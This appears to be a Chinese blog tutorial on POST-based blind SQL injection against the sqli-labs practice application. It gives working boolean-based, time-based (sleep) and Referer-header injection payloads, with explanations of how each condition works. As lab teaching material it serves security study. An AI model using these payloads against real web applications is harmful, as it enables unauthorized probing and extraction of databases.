SQL注入-POST方式SQL注入(二)

2022年8月11日11:06:21 发表评论 155 views

1.1 POST盲注

1.1.1 布尔型盲注

1.1.1.1  burpsuite开启截断

打开http://192.168.10.159/sqli-labs/Less-15/ 后开启burpsuite截断:

SQL注入-POST方式SQL注入(二)

1.1.1.2  提交表单数据

SQL注入-POST方式SQL注入(二)

1.1.1.3  修改表单提交的内容进行SQL注入

修改字符串:uname=admin' and (length(database())=8) --+ &passwd=admin&submit=Submit

SQL注入-POST方式SQL注入(二)

1.1.2 时间型盲注

修改字符串:uname=admin' and (select if(length(database())>1, sleep(3),null)) --+ &passwd=admin&submit=Submit

【字段解释】:

  • if(length(database())> 1,sleep(3),null)):条件成功则睡眠3秒,否则直接返回
  • length(database())> 1:判断条件
  • sleep(3):当条件成功时,则执行的内容
  • null:当条件不成功时执行的内容

SQL注入-POST方式SQL注入(二)

1.1.3 Referer盲注

修改字符串:Referer: http://192.168.10.159/sqli-labs/Less-19/' or (length(database()))=9 or if(1=1,sleep(3),null) or '1'='1

SQL注入-POST方式SQL注入(二)

【结果分析】:

(length(database())) =9 or if(1=1, sleep(3), null) or'1'= '1

语句中三个条件都为逻辑或,当第一个条件不成功时再执行第二个条件,第二个条件也不成功时则执行第三个,其中有一个条件执行成功时则不会向后继续执行。

以上实验中(length(database()))=9条件不成功,而后执行了if(1=1, sleep(3), null)条件,该条件中的判断为1=1,结果永远都是为真,而后执行sleep(3),最终页面响应时间是3秒。

weinxin
我的微信
如果有技术上的问题可以扫一扫我的微信
版权声明
1. 本网站名称:Leon的博客
2. 本站永久网址:https://blog.leonshadow.cn
3. 本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长QQ632113590进行删除处理。
4. 本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
5. 本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6. 本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
liyang